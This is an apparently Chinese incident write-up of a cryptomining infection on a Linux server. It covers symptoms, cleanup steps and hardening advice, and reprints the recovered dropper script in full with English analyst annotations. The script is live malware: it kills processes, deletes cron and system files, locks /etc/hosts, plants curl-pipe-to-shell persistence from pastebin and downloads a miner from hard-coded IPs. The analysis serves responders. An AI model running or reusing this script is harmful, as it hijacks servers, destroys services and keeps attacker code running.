现象
1.本地/etc/hosts文件被清空,且无法编辑,导致域名无法解析
2.被添加定时任务,且无法删除
3.服务器运行的某些服务被杀掉
4.CPU拉满
异常分析
#1.文件特殊属性(i 不可修改 / a 只能追加)使用lsattr命令查看
:~ # lsattr /etc/hosts
---------ia-----e---- /etc/hosts
:~ # chattr -ai /etc/hosts
:~ # lsattr /etc/hosts
---------ia-----e---- /etc/hosts #看起来属性没有去掉,实际上 chattr 已经生效,只是病毒程序会不断清空该文件并重新加上 i/a 属性
#2.定时任务crontab
:~ # crontab -l
*/5 * * * * curl -fsSL https://pastebin.com/raw/bwD1BCXt | sh
:~ # crontab -e #无法编辑,因为这个文件一直被创建并且覆盖掉原来的文件
#3.服务器部署运行的大部分服务被杀掉,是因为这样病毒才能占用服务器大量的CPU去挖矿等,这是服务宕掉的原因,也是病毒窃取服务器CPU的方式
病毒脚本
#病毒脚本由定时任务中的 curl(或 wget)下载后直接交给 sh 执行,内容如下
#!/bin/sh
# Analyst annotation of the script recovered from the infected host (it is the
# target of the crontab entry shown above). Comments describe only what each
# line visibly does so a responder can recognise the artefacts; the captured
# code itself is left byte-for-byte unchanged.
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
# --- Stage 1: kill processes by name ----------------------------------------
# Every process whose `ps aux` line contains one of these strings is SIGKILLed.
# Several of the names (kinsing, kdevtmp, and xmrig further down) belong to
# other cryptominer families; 'echo', 'urlopen', 'xmi' and 'xms' are broad
# enough to also hit legitimate processes.
ps aux | grep -v grep | grep 'givemexyz' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'dbuse' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'echo' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kdevtmp' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'urlopen' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'crun' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'javaupDates' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'x64b' | awk '{print $2}' | xargs -I % kill -9 %
# NOTE: plain grep treats '|' literally, so the "exclusion" pattern matches
# nothing and EVERY process with /tmp/ in its command line is killed
# (`cut -c 9-15` picks the PID column of `ps -ef`).
ps -ef | grep /tmp/ | grep -v 'java|redis|mongod|grep|weblogic|oracle|solr'| cut -c 9-15 | xargs kill -9
ps aux | grep -v grep | grep 'xmi' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'xms' | awk '{print $2}' | xargs -I % kill -9 %
pgrep JavaUpdate | xargs -I % kill -9 %
pgrep kinsing | xargs -I % kill -9 %
pgrep network | xargs -I % kill -9 %
pgrep donate | xargs -I % kill -9 %
pgrep kdevtmpfsi | xargs -I % kill -9 %
pgrep crun | xargs -I % kill -9 %
pgrep sysupdate | xargs -I % kill -9 %
pgrep mysqlserver | xargs -I % kill -9 %
# --- Stage 2: take over the current user's crontab --------------------------
# Strips immutable/append-only flags, wipes the existing crontab, then re-adds
# the curl|sh fetch every 5 minutes (the entry seen in `crontab -l` above).
# Because `crontab -r` has just run, the grep always fails and the entry is
# always re-installed; this is why `crontab -e` never "sticks".
chattr -ia /var/spool/cron/root
crontab -r
crontab -l | grep -e "bwD1BCXt" | grep -v grep
if [ $? -eq 0 ]; then
echo "cron good"
else
(
crontab -l 2>/dev/null
echo "*/5 * * * * curl -fsSL https://pastebin.com/raw/bwD1BCXt | sh"
) | crontab -
fi
# --- Stage 3: clear temp directories ----------------------------------------
# Strips attributes and deletes regular files (non-recursive `rm -f`) under
# /tmp and /var/tmp; subdirectories survive.
rm -f /tmp/.solra
pkill oracle.tmp
chattr -isa /tmp/*
chmod +rw /tmp/*
rm -f /tmp/*
rm -f /var/tmp/*
# If a process matching 'javae' already uses >=50% CPU ($3 of `ps aux` is
# %CPU) the script wipes /tmp again and exits 1; otherwise it kills
# weblogic.sh/javae. Presumably 'javae' is an earlier payload name -- not
# confirmable from this sample alone.
pp=$(ps auxf|grep javae|awk '{if($3>=50.0) print $2}')
name=""$pp
if [ -z "$name" ]
then
pkill weblogic.sh
pkill javae
else
rm -f /tmp/*
exit 1
fi
# --- Stage 4: privilege-dependent cleanup and persistence -------------------
s2=`whoami`
if [ `whoami` = "root" ];
then
# Root branch: removes every /etc/cron.d entry and a fixed list of paths
# (names used by other miner families / older droppers such as kinsing,
# kworkerds, sysupdate). It also deletes /usr/sbin/cron and /usr/bin/node,
# which breaks legitimate services on the host.
chattr -ia /etc/cron.d/*
rm -rf /etc/cron.d/*
chattr -i /var/spool/cron/crontabs/root
chattr -i /usr/local/bin/dns
rm -f /etc/cron.hourly/oanacroner
rm -f /etc/cron.hourly/oanacrona
rm -f /etc/cron.daily/oanacroner
rm -f /etc/cron.daily/oanacrona
rm -f /etc/cron.monthly/oanacroner
rm -f /usr/local/bin/dns
rm -f /etc/update.sh
# Empties /etc/hosts and locks it immutable + append-only: this is the
# "hosts file blanked and cannot be edited" symptom described above.
chattr -ia /etc/hosts
echo >/etc/hosts
chattr +ia /etc/hosts
chattr -i /etc/sysupdate
rm -f /etc/sysupdate
rm -f /etc/config.json
rm -f /var/tmp/kworkerds
rm -f /usr/bin/.systemcero
rm -f /usr/bin/cloudupdate
rm -f /usr/bin/diskmanagerd
rm -f /lib/libterminfo.so
rm -f /bin/httpsntp
rm -f /bin/ftpsntp
rm -f /var/tmp/jspserv
rm -f /usr/sbin/cron
rm -f /usr/bin/kinsing*
rm -f /etc/cron.d/kinsing*
rm -f /usr/bin/node
chattr -isa /var/spool/cron/*
rm -rf /var/spool/cron/*
chattr +isa /tmp/xms
rm -f /var/tmp/kinsing
# Persistence, four copies: /etc/crontab, /etc/cron.d/root,
# /var/spool/cron/root and /var/spool/cron/crontabs/root each receive a
# 10-minute curl|sh job and are then locked with +ia. A responder has to
# `chattr -ia` each of these files before the entries can be removed.
chattr -ia /etc/crontab
echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/kqK9uFpy | sh' > /etc/crontab
chattr +ia /etc/crontab
chattr -ia /var/spool/cron/root
chattr -ia /var/spool/cron/crontabs/root
echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/kqK9uFpy | bash' >/var/spool/cron/root
echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/kqK9uFpy | bash' >/var/spool/cron/crontabs/root
echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/kqK9uFpy | sh' > /etc/cron.d/root
chattr +ia /var/spool/cron/root
chattr +ia /etc/cron.d/root
chattr +ia /var/spool/cron/crontabs/root
else
# Non-root branch: kills processes whose ps line contains the first 7
# characters of the current username. ${s2:0:7} is a bash substring
# expansion; under a non-bash /bin/sh this line presumably errors out --
# unverified. The '|'-joined exclusion is again a literal string, so nothing
# is actually excluded. `$2` is the script's own second argument, normally
# unset, so the second command likely does nothing useful.
ps aux | grep -v 'java|redis|weblogic|mongod|mysql|oracle|tomcat|grep|postgres|confluence|awk|sbin|WebLogic.sh|server|aux|httpd|sh|sbin|' | grep ${s2:0:7} | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v 'java|redis|weblogic|mongod|mysql|oracle|tomcat|grep|postgres|confluence|awk|sbin|WebLogic.sh|server|aux|httpd|sh|sbin|' | grep $2 | awk '{print $2}' | xargs -I % kill -9 %
fi
# Makes everything left in /tmp world-writable, kills further miner process
# names (xmrig is a well-known miner) and removes c3pool directories (c3pool
# is presumably a mining-pool client install) under /root and ~.
chmod +777 /tmp/*
pkill node
pkill networkservice
pkill networkser+
pkill watchbog
pkill xmrig
pkill miner.sh
rm -rf /root/c3pool/*
rm -rf ~/c3pool/*
# Pre-creates the directory names other payloads drop into and makes two of
# them non-writable -- presumably to block competing infections from
# installing themselves.
mkdir /tmp/dbusex
mkdir /var/tmp/dbusex
mkdir /var/tmp/go
mkdir /tmp/x86_64
mkdir /tmp/i686
mkdir /tmp/x86_643
mkdir /tmp/x64b
mkdir /tmp/go
mkdir /tmp/xmi
mkdir /tmp/zzz
mkdir /tmp/kingsing
pkill dbused
mkdir /var/tmp/kinsing
chmod -w /var/tmp/kinsing
mkdir /tmp/kdevtmpfsi
chmod -w /tmp/kdevtmpfsi
# --- Stage 5: fetch and launch the payload ----------------------------------
# If no 'solrd' process is already at >=60% CPU: kill solr.sh/solrd, then kill
# ANY process above 60% CPU (the exclusion string is literal once more, so
# database and Java services are not spared -- matching the "services killed,
# CPU pegged" symptoms above), download config.json, the binary (served as
# java.exe, stored as solrd) and a launcher from three hard-coded IPs into
# /tmp/.solr, start the launcher detached, and delete the launcher 10 s later.
# Under bash `&>>/dev/null` discards output; under dash it is parsed as two
# background jobs and output would land in nohup.out -- unverified.
# IoCs for detection: /tmp/.solr/, /tmp/.solr/solrd, /tmp/.solr/config.json,
# the three download hosts below and the two pastebin URLs above.
p=$(ps auxf|grep solrd|awk '{if($3>=60.0) print $2}')
name=""$p
if [ -z "$name" ]
then
pkill solr.sh
pkill solrd
ps aux | grep -v grep | grep -v 'java|redis|mongod|mysql|oracle|tomcat|grep|postgres|confluence|awk|aux|sh' | awk '{if($3>60.0) print $2}' | xargs -I % kill -9 %
mkdir /tmp/.solr
curl -fsSL http://136.243.19.213:8885/docs/config.json -o /tmp/.solr/config.json
curl -fsSL http://222.122.47.27:2143/auth/java.exe -o /tmp/.solr/solrd
curl -fsSL http://27.1.1.34:8080/docs/solr.sh -o /tmp/.solr/solr.sh
chmod +x /tmp/.solr/solrd
chmod +x /tmp/.solr/solr.sh
nohup /tmp/.solr/solr.sh &>>/dev/null &
sleep 10
rm -f /tmp/.solr/solr.sh
else
# A solrd miner is already running hot: nothing more to do.
exit
fi
病毒内部代码逻辑参考
解决方法
#先用 chattr -ia 去掉 /etc/hosts、/etc/crontab、/etc/cron.d/root、/var/spool/cron/* 等文件的 i/a 属性并清除其中的定时任务,再 kill 掉病毒程序的主进程;若只杀进程,定时任务每 5 分钟会重新下载并执行脚本
病毒攻击方式分析
1.系统漏洞
2.常用服务、自开发服务的漏洞
3.对外开放端口上所暴露服务的漏洞
4.弱密码漏洞
系统优化
#1.更新系统补丁
#2.修改redis等服务的绑定地址,限定可以连接Redis服务器的IP
#3.修改常用服务的端口
#4.修改服务器、服务的密码
#5.优化ssh服务,删除 ~/.ssh/authorized_keys 下的陌生公钥
#6.在路由器上封禁IP或IP段